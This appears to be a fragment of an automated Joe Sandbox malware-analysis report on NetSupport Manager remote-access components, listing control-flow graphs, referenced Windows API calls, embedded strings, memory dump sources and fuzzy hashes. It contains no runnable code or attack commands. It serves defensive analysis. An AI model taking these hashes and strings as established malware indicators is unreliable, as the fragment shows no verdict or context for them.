                                                                                        • Opcode Fuzzy Hash: 8553bc6099e20886475e57441cfb7e1e8bd29e0dd43b802f9498621cef424bfe
                                                                                        • Instruction Fuzzy Hash: 815116716443099FE7109F65CD48B7773B9BFAA318F114118E609D7299DBF8E880CBA2

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2703 6d1c98d0-6d1c9932 2704 6d1c9934-6d1c9955 call 6d1c30a0 call 6d1e28e1 2703->2704 2705 6d1c9956-6d1c995e 2703->2705 2707 6d1c9964-6d1c9979 call 6d1e28f0 2705->2707 2708 6d1c9ac5-6d1c9acc 2705->2708 2707->2708 2724 6d1c997f-6d1c9994 call 6d1e4330 2707->2724 2711 6d1c9ace-6d1c9adb 2708->2711 2712 6d1c9b19-6d1c9b1d 2708->2712 2717 6d1c9add-6d1c9af6 wsprintfA 2711->2717 2718 6d1c9af8-6d1c9b07 wsprintfA 2711->2718 2713 6d1c9b1f-6d1c9b26 2712->2713 2714 6d1c9b4b-6d1c9b70 GetTickCount InterlockedExchange EnterCriticalSection 2712->2714 2713->2714 2720 6d1c9b28-6d1c9b41 call 6d1c77b0 2713->2720 2722 6d1c9b9c-6d1c9ba1 2714->2722 2723 6d1c9b72-6d1c9b9b LeaveCriticalSection call 6d1c30a0 call 6d1e28e1 2714->2723 2719 6d1c9b0a-6d1c9b16 call 6d1c52b0 2717->2719 2718->2719 2719->2712 2720->2714 2741 6d1c9b43-6d1c9b45 2720->2741 2725 6d1c9bfb-6d1c9c05 2722->2725 2726 6d1c9ba3-6d1c9bd0 call 6d1c4dd0 2722->2726 2724->2708 2744 6d1c999a-6d1c99af call 6d1e28f0 2724->2744 2733 6d1c9c3b-6d1c9c47 2725->2733 2734 6d1c9c07-6d1c9c17 2725->2734 2746 6d1c9d4b-6d1c9d6c LeaveCriticalSection call 6d1d77e0 2726->2746 2747 6d1c9bd6-6d1c9bf6 WSAGetLastError call 6d1c30a0 2726->2747 2743 6d1c9c50-6d1c9c5a 2733->2743 2739 6d1c9c19-6d1c9c1d 2734->2739 2740 6d1c9c20-6d1c9c22 2734->2740 2739->2740 2750 6d1c9c1f 2739->2750 2740->2733 2751 6d1c9c24-6d1c9c36 call 6d1c46c0 2740->2751 2741->2714 2748 6d1c9d2e-6d1c9d3b call 6d1c30a0 2743->2748 2749 6d1c9c60-6d1c9c65 2743->2749 2744->2708 2761 6d1c99b5-6d1c99f1 2744->2761 2768 6d1c9d6e-6d1c9d72 InterlockedIncrement 2746->2768 2769 6d1c9d78-6d1c9d8a call 6d1e28e1 2746->2769 2747->2746 2766 6d1c9d45 2748->2766 2756 6d1c9c67-6d1c9c6b 2749->2756 2757 6d1c9c71-6d1c9c9a send 2749->2757 2750->2740 2751->2733 2756->2748 2756->2757 2764 6d1c9c9c-6d1c9c9f 2757->2764 2765 6d1c9cf1-6d1c9d0f call 6d1c30a0 2757->2765 2767 6d1c99f7-6d1c99ff 2761->2767 2771 6d1c9cbe-6d1c9cce WSAGetLastError 2764->2771 2772 6d1c9ca1-6d1c9cac 2764->2772 2765->2766 2766->2746 2773 6d1c9a05-6d1c9a08 2767->2773 2774 6d1c9aa3-6d1c9ac2 call 6d1c30a0 2767->2774 2768->2769 2776 6d1c9cd0-6d1c9ce9 timeGetTime Sleep 2771->2776 2777 6d1c9d11-6d1c9d2c call 6d1c30a0 2771->2777 2772->2766 2779 6d1c9cb2-6d1c9cbc 2772->2779 2780 6d1c9a0e 2773->2780 2781 6d1c9a0a-6d1c9a0c 2773->2781 2774->2708 2776->2743 2785 6d1c9cef 2776->2785 2777->2766 2779->2776 2786 6d1c9a14-6d1c9a1d 2780->2786 2781->2786 2785->2766 2789 6d1c9a8d-6d1c9a8e 2786->2789 2790 6d1c9a1f-6d1c9a22 2786->2790 2789->2774 2791 6d1c9a24 2790->2791 2792 6d1c9a26-6d1c9a35 2790->2792 2791->2792 2793 6d1c9a37-6d1c9a3a 2792->2793 2794 6d1c9a90-6d1c9a93 2792->2794 2796 6d1c9a3c 2793->2796 2797 6d1c9a3e-6d1c9a4d 2793->2797 2795 6d1c9a9d 2794->2795 2795->2774 2796->2797 2798 6d1c9a4f-6d1c9a52 2797->2798 2799 6d1c9a95-6d1c9a98 2797->2799 2800 6d1c9a54 2798->2800 2801 6d1c9a56-6d1c9a65 2798->2801 2799->2795 2800->2801 2802 6d1c9a9a 2801->2802 2803 6d1c9a67-6d1c9a6a 2801->2803 2802->2795 2804 6d1c9a6c 2803->2804 2805 6d1c9a6e-6d1c9a85 2803->2805 2804->2805 2805->2767 2806 6d1c9a8b 2805->2806 2806->2774
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _strncmp
                                                                                        • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                        • API String ID: 909875538-2848211065
                                                                                        • Opcode ID: 9cd674f17899834245a98cde44ab10a05477c15b955cb154e5f8b738067df387
                                                                                        • Instruction ID: c35e5f2b78db87f94c2d2d35394ebc6e2eb4026d3ba70a6673d74566c6e4fd6c
                                                                                        • Opcode Fuzzy Hash: 9cd674f17899834245a98cde44ab10a05477c15b955cb154e5f8b738067df387
                                                                                        • Instruction Fuzzy Hash: 45D15971A042199FDB20CF64CC94BEAB7B4AF2A30DF0140D9E90D9B249D7B9D985CF52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2807 110285f0-1102860d 2808 11028613-11028642 2807->2808 2809 11028cd8-11028cdf 2807->2809 2810 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2808->2810 2811 11028648-1102864e 2808->2811 2812 11028cf1-11028cf5 2809->2812 2813 11028ce1-11028cea 2809->2813 2827 1102871d 2810->2827 2815 11028650-11028658 2811->2815 2817 11028cf7-11028d09 call 11161d01 2812->2817 2818 11028d0a-11028d1e call 11161d01 2812->2818 2813->2812 2816 11028cec 2813->2816 2815->2815 2822 1102865a-11028660 2815->2822 2816->2812 2826 11028663-11028668 2822->2826 2826->2826 2828 1102866a-11028674 2826->2828 2829 11028720-1102872a 2827->2829 2830 11028691-11028697 2828->2830 2831 11028676-1102867d 2828->2831 2833 11028730-11028733 2829->2833 2834 11028ccf-11028cd7 2829->2834 2832 11028698-1102869e 2830->2832 2835 11028680-11028686 2831->2835 2832->2832 2837 110286a0-110286ce call 11163fed 2832->2837 2833->2834 2838 11028739-11028747 call 11026890 2833->2838 2834->2809 2835->2835 2836 11028688-1102868e 2835->2836 2836->2830 2837->2829 2843 11028c55-11028c6a call 11163db7 2838->2843 2844 1102874d-11028760 call 11162de7 2838->2844 2843->2834 2851 11028c70-11028cca 2843->2851 2849 11028762-11028765 2844->2849 2850 1102876b-11028793 call 11026700 call 11026890 2844->2850 2849->2843 2849->2850 2850->2843 2856 11028799-110287b6 call 11026980 call 11026890 2850->2856 2851->2834 2861 11028bc5-11028bcc 2856->2861 2862 110287bc 2856->2862 2863 11028bf2-11028bf9 2861->2863 2864 11028bce-11028bd1 2861->2864 2865 110287c0-110287e0 call 11026700 2862->2865 2868 11028c11-11028c18 2863->2868 2869 11028bfb-11028c01 2863->2869 2864->2863 2867 11028bd3-11028bda 2864->2867 2875 110287e2-110287e5 2865->2875 2876 11028816-11028819 2865->2876 2873 11028be0-11028bf0 2867->2873 2871 11028c1a-11028c25 2868->2871 2872 11028c28-11028c2f 2868->2872 2874 11028c07-11028c0f 2869->2874 2871->2872 2877 11028c31-11028c3b 2872->2877 2878 11028c3e-11028c45 2872->2878 2873->2863 2873->2873 2874->2868 2874->2874 2879 110287e7-110287ee 2875->2879 2880 110287fe-11028801 2875->2880 2882 11028bae-11028bbf call 11026890 2876->2882 2883 1102881f-11028832 call 11164150 2876->2883 2877->2878 2878->2843 2881 11028c47-11028c52 2878->2881 2884 110287f4-110287fc 2879->2884 2880->2882 2885 11028807-11028811 2880->2885 2881->2843 2882->2861 2882->2865 2883->2882 2890 11028838-11028854 call 111646ce 2883->2890 2884->2880 2884->2884 2885->2882 2893 11028856-1102885c 2890->2893 2894 1102886f-11028885 call 111646ce 2890->2894 2896 11028860-11028868 2893->2896 2899 11028887-1102888d 2894->2899 2900 1102889f-110288b5 call 111646ce 2894->2900 2896->2896 2897 1102886a 2896->2897 2897->2882 2901 11028890-11028898 2899->2901 2905 110288b7-110288bd 2900->2905 2906 110288cf-110288e5 call 111646ce 2900->2906 2901->2901 2903 1102889a 2901->2903 2903->2882 2907 110288c0-110288c8 2905->2907 2911 110288e7-110288ed 2906->2911 2912 110288ff-11028915 call 111646ce 2906->2912 2907->2907 2909 110288ca 2907->2909 2909->2882 2913 110288f0-110288f8 2911->2913 2917 11028917-1102891d 2912->2917 2918 1102892f-11028945 call 111646ce 2912->2918 2913->2913 2915 110288fa 2913->2915 2915->2882 2919 11028920-11028928 2917->2919 2923 11028947-1102894d 2918->2923 2924 1102895f-11028975 call 111646ce 2918->2924 2919->2919 2921 1102892a 2919->2921 2921->2882 2926 11028950-11028958 2923->2926 2929 11028977-1102897d 2924->2929 2930 1102898f-110289a5 call 111646ce 2924->2930 2926->2926 2928 1102895a 2926->2928 2928->2882 2931 11028980-11028988 2929->2931 2935 110289a7-110289ad 2930->2935 2936 110289bf-110289d5 call 111646ce 2930->2936 2931->2931 2933 1102898a 2931->2933 2933->2882 2937 110289b0-110289b8 2935->2937 2941 110289d7-110289dd 2936->2941 2942 110289ef-11028a05 call 111646ce 2936->2942 2937->2937 2939 110289ba 2937->2939 2939->2882 2944 110289e0-110289e8 2941->2944 2947 11028a07-11028a0d 2942->2947 2948 11028a1f-11028a35 call 111646ce 2942->2948 2944->2944 2945 110289ea 2944->2945 2945->2882 2949 11028a10-11028a18 2947->2949 2953 11028a37-11028a3d 2948->2953 2954 11028a4f-11028a65 call 111646ce 2948->2954 2949->2949 2951 11028a1a 2949->2951 2951->2882 2955 11028a40-11028a48 2953->2955 2959 11028a86-11028a9c call 111646ce 2954->2959 2960 11028a67-11028a6d 2954->2960 2955->2955 2957 11028a4a 2955->2957 2957->2882 2965 11028ab3-11028ac9 call 111646ce 2959->2965 2966 11028a9e 2959->2966 2961 11028a77-11028a7f 2960->2961 2961->2961 2963 11028a81 2961->2963 2963->2882 2971 11028ae0-11028af6 call 111646ce 2965->2971 2972 11028acb 2965->2972 2967 11028aa4-11028aac 2966->2967 2967->2967 2969 11028aae 2967->2969 2969->2882 2977 11028b17-11028b2d call 111646ce 2971->2977 2978 11028af8-11028afe 2971->2978 2974 11028ad1-11028ad9 2972->2974 2974->2974 2976 11028adb 2974->2976 2976->2882 2983 11028b4f-11028b65 call 111646ce 2977->2983 2984 11028b2f-11028b3f 2977->2984 2979 11028b08-11028b10 2978->2979 2979->2979 2981 11028b12 2979->2981 2981->2882 2989 11028b67-11028b6d 2983->2989 2990 11028b7c-11028b92 call 111646ce 2983->2990 2985 11028b40-11028b48 2984->2985 2985->2985 2987 11028b4a 2985->2987 2987->2882 2992 11028b70-11028b78 2989->2992 2990->2882 2995 11028b94-11028b9a 2990->2995 2992->2992 2993 11028b7a 2992->2993 2993->2882 2996 11028ba4-11028bac 2995->2996 2996->2882 2996->2996
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73F71370,?,0000001A), ref: 110286DD
                                                                                        • _strrchr.LIBCMT ref: 110286EC
                                                                                          • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                        • API String ID: 1609618855-357498123
                                                                                        • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                        • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                        • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                        • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D6BD5
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D6C26
                                                                                        • Sleep.KERNEL32(00000064), ref: 6D1D6C5B
                                                                                          • Part of subcall function 6D1D6940: GetTickCount.KERNEL32 ref: 6D1D6950
                                                                                        • WaitForSingleObject.KERNEL32(0000030C,?), ref: 6D1D6C7C
                                                                                        • _memmove.LIBCMT ref: 6D1D6C93
                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6D1D6CB4
                                                                                        • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6D1D6CD9
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D6CEC
                                                                                        • _calloc.LIBCMT ref: 6D1D6D76
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D6DF3
                                                                                        • InterlockedExchange.KERNEL32(01713032,00000000), ref: 6D1D6E01
                                                                                        • _calloc.LIBCMT ref: 6D1D6E33
                                                                                        • _memmove.LIBCMT ref: 6D1D6E47
                                                                                        • InterlockedDecrement.KERNEL32(01712FDA), ref: 6D1D6EC3
                                                                                        • SetEvent.KERNEL32(0000031C), ref: 6D1D6ECF
                                                                                        • _memmove.LIBCMT ref: 6D1D6EF4
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D6F4F
                                                                                        • InterlockedExchange.KERNEL32(01712F7A,-6D20A188), ref: 6D1D6F60
                                                                                        Strings
                                                                                        • FALSE, xrefs: 6D1D6E67
                                                                                        • ProcessMessage returned FALSE. Terminating connection, xrefs: 6D1D6F25
                                                                                        • ResumeTimeout, xrefs: 6D1D6BBA
                                                                                        • httprecv, xrefs: 6D1D6BDD
                                                                                        • ReadMessage returned FALSE. Terminating connection, xrefs: 6D1D6F3A
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6D1D6E62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                        • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                        • API String ID: 1449423504-919941520
                                                                                        • Opcode ID: 36f838d5c6901acd6d1c9feed0cdcbd10bc95e07c2061b2e7cc74252121e46a4
                                                                                        • Instruction ID: f2195fba641d69a1e3fbe74b88e4dd72737b062e9b435738f43ca27a29c32769
                                                                                        • Opcode Fuzzy Hash: 36f838d5c6901acd6d1c9feed0cdcbd10bc95e07c2061b2e7cc74252121e46a4
                                                                                        • Instruction Fuzzy Hash: 4CB1C2B1D4425C9BDB20DF64CD48BEAB3B4EB59348F0140DAE649A7248D7F49AC0CFA1
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                        • API String ID: 2201880244-3035937465
                                                                                        • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                        • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                        • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                        • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 3535843008-2062829784
                                                                                        • Opcode ID: 9735336a69bbdc274ed53a66040cb7ee1bfed29be017be3f96cc698dd169788a
                                                                                        • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                        • Opcode Fuzzy Hash: 9735336a69bbdc274ed53a66040cb7ee1bfed29be017be3f96cc698dd169788a
                                                                                        • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                          • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        • wsprintfA.USER32 ref: 11028214
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                        • wsprintfA.USER32 ref: 11028291
                                                                                        • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                        • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                        • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                        • API String ID: 512045693-419896573
                                                                                        • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                        • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                        • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                        • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
